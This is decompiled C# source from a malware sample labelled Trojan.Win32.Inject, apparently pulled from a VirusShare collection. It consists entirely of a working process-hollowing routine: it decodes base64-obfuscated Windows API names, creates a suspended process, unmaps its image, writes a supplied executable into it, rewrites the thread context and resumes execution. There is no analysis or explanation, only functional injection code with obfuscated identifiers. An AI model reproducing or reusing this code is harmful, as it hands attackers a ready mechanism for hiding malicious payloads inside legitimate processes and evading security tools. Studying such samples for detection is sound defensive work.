// Decompiled with JetBrains decompiler
// Type: lnrosxxr
// Assembly: sub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 1EFA436E-F791-4E79-A4FC-753DBB8ECCD0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Inject.echy-227c3fafebb1b2fb6e3ecabc01855dde70a017a840076a50939ff1c6af65afb8.exe

using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
using System.Text;

[StandardModule]
internal sealed class lnrosxxr
{
  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
  public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string QPRy);

  [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
  public static extern IntPtr GetProcAddress(IntPtr XocgCC, [MarshalAs(UnmanagedType.VBByRefStr)] ref string VTHDGEi);

  public static T xuenvoeckpvidziiu<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(lnrosxxr.GetProcAddress(lnrosxxr.LoadLibraryA(ref name), ref method), typeof (T));

  public static bool kdijxgxspauejyavprx(byte[] xsuiqqwrqeniwbwnz, string pgatylcppynhtbqgvu)
  {
    lnrosxxr.lnrosxxresclbnzeb lnrosxxresclbnzeb = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.lnrosxxresclbnzeb>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
    lnrosxxr.vwqyfungepvutuatxbzi vwqyfungepvutuatxbzi = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.vwqyfungepvutuatxbzi>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
    lnrosxxr.uhvycpyqufrlfzhglja uhvycpyqufrlfzhglja = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.uhvycpyqufrlfzhglja>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
    lnrosxxr.jxrvsgicziznszcjx jxrvsgicziznszcjx = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.jxrvsgicziznszcjx>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
    lnrosxxr.eilqikeyqjujvfvkjnrd eilqikeyqjujvfvkjnrd = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.eilqikeyqjujvfvkjnrd>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
    lnrosxxr.nxxbhqnoostjpwpsz nxxbhqnoostjpwpsz = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.nxxbhqnoostjpwpsz>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
    lnrosxxr.sqiuwbybitiopbystw sqiuwbybitiopbystw = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.sqiuwbybitiopbystw>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
    lnrosxxr.soiyyrevooirbokub soiyyrevooirbokub = lnrosxxr.xuenvoeckpvidziiu<lnrosxxr.soiyyrevooirbokub>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
    bool flag;
    try
    {
      IntPtr zero1 = IntPtr.Zero;
      IntPtr[] poegrpgaokukwhbc = new IntPtr[4];
      byte[] fjplrhicndhdizglrwr = new byte[68];
      int int32_1 = BitConverter.ToInt32(xsuiqqwrqeniwbwnz, 60);
      int int16 = (int) BitConverter.ToInt16(xsuiqqwrqeniwbwnz, checked (int32_1 + 6));
      IntPtr gobjshapdwhffjwrqj = new IntPtr(BitConverter.ToInt32(xsuiqqwrqeniwbwnz, checked (int32_1 + 84)));
      if (lnrosxxresclbnzeb((string) null, new StringBuilder(pgatylcppynhtbqgvu), zero1, zero1, false, 4, zero1, (string) null, fjplrhicndhdizglrwr, poegrpgaokukwhbc))
      {
        uint[] numArray1 = new uint[179];
        numArray1[0] = 65538U;
        if (vwqyfungepvutuatxbzi(poegrpgaokukwhbc[1], numArray1))
        {
          IntPtr iesuuhchynegvvzlqz = new IntPtr(checked ((long) numArray1[41] + 8L));
          IntPtr zero2 = IntPtr.Zero;
          IntPtr kgvischhvgphidni = new IntPtr(4);
          IntPtr zero3 = IntPtr.Zero;
          if (uhvycpyqufrlfzhglja(poegrpgaokukwhbc[0], iesuuhchynegvvzlqz, ref zero2, (int) kgvischhvgphidni, ref zero3) && soiyyrevooirbokub(poegrpgaokukwhbc[0], zero2) == 0U)
          {
            IntPtr num1 = new IntPtr(BitConverter.ToInt32(xsuiqqwrqeniwbwnz, checked (int32_1 + 52)));
            IntPtr num2 = new IntPtr(BitConverter.ToInt32(xsuiqqwrqeniwbwnz, checked (int32_1 + 80)));
            IntPtr dvjxepuaeohgthdhpei = jxrvsgicziznszcjx(poegrpgaokukwhbc[0], num1, num2, 12288, 64);
            int int32_2 = dvjxepuaeohgthdhpei.ToInt32();
            int sfztruhrredwfadfexn;
            int num3 = eilqikeyqjujvfvkjnrd(poegrpgaokukwhbc[0], dvjxepuaeohgthdhpei, xsuiqqwrqeniwbwnz, checked ((uint) (int) gobjshapdwhffjwrqj), sfztruhrredwfadfexn) ? 1 : 0;
            int num4 = checked (int16 - 1);
            int num5 = 0;
            while (num5 <= num4)
            {
              int[] dst = new int[10];
              Buffer.BlockCopy((Array) xsuiqqwrqeniwbwnz, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
              byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
              Buffer.BlockCopy((Array) xsuiqqwrqeniwbwnz, dst[5], (Array) numArray2, 0, numArray2.Length);
              num2 = new IntPtr(checked (int32_2 + dst[3]));
              num1 = new IntPtr(numArray2.Length);
              int num6 = eilqikeyqjujvfvkjnrd(poegrpgaokukwhbc[0], num2, numArray2, checked ((uint) (int) num1), sfztruhrredwfadfexn) ? 1 : 0;
              checked { ++num5; }
            }
            num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
            num1 = new IntPtr(4);
            int num7 = eilqikeyqjujvfvkjnrd(poegrpgaokukwhbc[0], num2, BitConverter.GetBytes(dvjxepuaeohgthdhpei.ToInt32()), checked ((uint) (int) num1), sfztruhrredwfadfexn) ? 1 : 0;
            numArray1[44] = checked ((uint) (dvjxepuaeohgthdhpei.ToInt32() + BitConverter.ToInt32(xsuiqqwrqeniwbwnz, int32_1 + 40)));
            int num8 = nxxbhqnoostjpwpsz(poegrpgaokukwhbc[1], numArray1) ? 1 : 0;
          }
        }
        int num = (int) sqiuwbybitiopbystw(poegrpgaokukwhbc[1]);
      }
    }
    catch (Exception ex)
    {
      ProjectData.SetProjectError(ex);
      flag = false;
      ProjectData.ClearProjectError();
      goto label_11;
    }
    return true;
label_11:
    return flag;
  }

  [return: MarshalAs(UnmanagedType.Bool)]
  public delegate bool lnrosxxresclbnzeb(
    string ietrditgqlkybeccz,
    StringBuilder gisswaffbyrczcjbek,
    IntPtr tddvzyuanpptiley,
    IntPtr ycqlhnopsrfcrqntkq,
    [MarshalAs(UnmanagedType.Bool)] bool eaujxngrghxreezr,
    int jagdrflhlgcppngkw,
    IntPtr qftzyqcyyhqalvcldis,
    string bvdqwpklthusqazhws,
    byte[] fjplrhicndhdizglrwr,
    IntPtr[] poegrpgaokukwhbc);

  public delegate bool eilqikeyqjujvfvkjnrd(
    IntPtr hiknaiiqyqcrskcd,
    IntPtr dvjxepuaeohgthdhpei,
    byte[] rayhtovktvtpnqsprofv,
    uint gobjshapdwhffjwrqj,
    int sfztruhrredwfadfexn);

  [return: MarshalAs(UnmanagedType.Bool)]
  public delegate bool uhvycpyqufrlfzhglja(
    IntPtr hpjvxhftkugsddeoaxrv,
    IntPtr iesuuhchynegvvzlqz,
    ref IntPtr aanqiibdlcdgsyaiuthg,
    int kgvischhvgphidni,
    ref IntPtr tnieryiajydgnfah);

  public delegate IntPtr jxrvsgicziznszcjx(
    IntPtr ptxvzenhfiyxjrukuiaa,
    IntPtr gwsrduhhhelsotxpp,
    IntPtr wscnyxncgrtvlwsjy,
    int oykcpqvtqoonaicn,
    int bsgijtjjdskoknjpk);

  public delegate uint soiyyrevooirbokub(IntPtr pchcqqapnkhkylpkukd, IntPtr pbqsnhkivlaqctbphk);

  public delegate uint sqiuwbybitiopbystw(IntPtr lcelxaicxuenriantqju);

  [return: MarshalAs(UnmanagedType.Bool)]
  public delegate bool vwqyfungepvutuatxbzi(IntPtr roayflzfrbzsjwfviu, uint[] gxhyqcduubsjikzqk);

  [return: MarshalAs(UnmanagedType.Bool)]
  public delegate bool nxxbhqnoostjpwpsz(IntPtr fxhcxwrwbwnndyrzoofq, uint[] idtsddwgyflpctwdc);
}